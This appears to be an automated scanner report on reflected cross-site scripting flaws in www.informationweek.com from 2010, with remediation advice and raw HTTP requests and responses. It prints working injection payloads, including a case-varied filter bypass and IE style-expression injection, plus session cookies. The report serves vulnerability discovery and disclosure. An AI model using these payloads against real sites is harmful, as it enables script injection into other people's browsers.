The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bdf8</ScRiPt%20><script>alert(1)</script>6ff2fa07d8 was submitted in the REST URL parameter 2. This input was echoed as 1bdf8</ScRiPt ><script>alert(1)</script>6ff2fa07d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /video/1bdf8</ScRiPt%20><script>alert(1)</script>6ff2fa07d8/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30451
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/1bdf8</ScRiPt ><script>alert(1)</script>6ff2fa07d8/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=241780941;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313cf"%20style%3dx%3aexpr/**/ession(alert(1))%20c408225f0d4 was submitted in the REST URL parameter 2. This input was echoed as 313cf" style=x:expr/**/ession(alert(1)) c408225f0d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/313cf"%20style%3dx%3aexpr/**/ession(alert(1))%20c408225f0d4/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30525
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/313cf" style=x:expr/**/ession(alert(1)) c408225f0d4/;kvarticleid=;kvauthor=;loc=300;grp=138397715" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537b8"%20style%3dx%3aexpression(alert(1))%20071df3067fb was submitted in the REST URL parameter 1. This input was echoed as 537b8" style=x:expression(alert(1)) 071df3067fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /537b8"%20style%3dx%3aexpression(alert(1))%20071df3067fb/security/20464495001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30787
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/537b8" style=x:expression(alert(1)) 071df3067fb/security/2;kvarticleid=;kvauthor=;loc=300;grp=38540052" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c16f3'-alert(1)-'13ba2423412 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c16f3'-alert(1)-'13ba2423412/security/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30622
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/c16f3'-alert(1)-'13ba2423412/security/20464495001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=486580146;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e78f"><script>alert(1)</script>8dfee8c03fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/3e78f"><script>alert(1)</script>8dfee8c03fc/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 35484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/3e78f"><script>alert(1)</script>8dfee8c03fc/20464495;kvarticleid=;kvauthor=;loc=300;grp=194178644" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf24'-alert(1)-'c2d2cd2f22c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/dbf24'-alert(1)-'c2d2cd2f22c/20464495001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/dbf24'-alert(1)-'c2d2cd2f22c/20464495001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=818048985;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54b38'-alert(1)-'15242bb4563 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/54b38'-alert(1)-'15242bb4563 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:20 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:20 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30573
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/54b38'-alert(1)-'15242bb4563;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=972311011;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a06"a%3d"b"69c28fb7c6b was submitted in the REST URL parameter 3. This input was echoed as 94a06"a="b"69c28fb7c6b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/94a06"a%3d"b"69c28fb7c6b HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30541
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/94a06"a="b"69c28fb7c6b;kvarticleid=;kvauthor=;loc=300;grp=180057014" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae42"style%3d"x%3aexpression(alert(1))"7f51aa4d9f2 was submitted in the REST URL parameter 2. This input was echoed as 2ae42"style="x:expression(alert(1))"7f51aa4d9f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/2ae42"style%3d"x%3aexpression(alert(1))"7f51aa4d9f2/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/2ae42"style="x:expression(alert(1))"7f51aa4d9f2/2097;kvarticleid=;kvauthor=;loc=300;grp=385361240" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b5ec</script>e4b85e9dcc5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/1b5ec</script>e4b85e9dcc5/20979809001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 93374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/video/1b5ec</script>e4b85e9dcc5/20979809001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=262056879;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aab2a'-alert(1)-'3150d050d55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/20979809001aab2a'-alert(1)-'3150d050d55 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:30 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:30 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30661
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... cr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/20979809001aab2a'-alert(1)-'3150d050d55;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=248351618;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff9a"><a%20b%3dc>c1356de54c6 was submitted in the REST URL parameter 3. This input was echoed as bff9a"><a b=c>c1356de54c6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/security/20979809001bff9a"><a%20b%3dc>c1356de54c6 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30657
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video/security/20979809001bff9a"><a b=c>c1356de54c6;kvarticleid=;kvauthor=;loc=300;grp=425805144" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 453a0</script>f82539d1517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video453a0</script>f82539d1517/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:52 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:52 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30641
<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> --> <!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var fo ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/video453a0</script>f82539d1517/security/21090964001;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=363645210;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /videoe638a"><ScRiPt>alert(1)</ScRiPt>e7ef98dc374/security/21090964001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30771
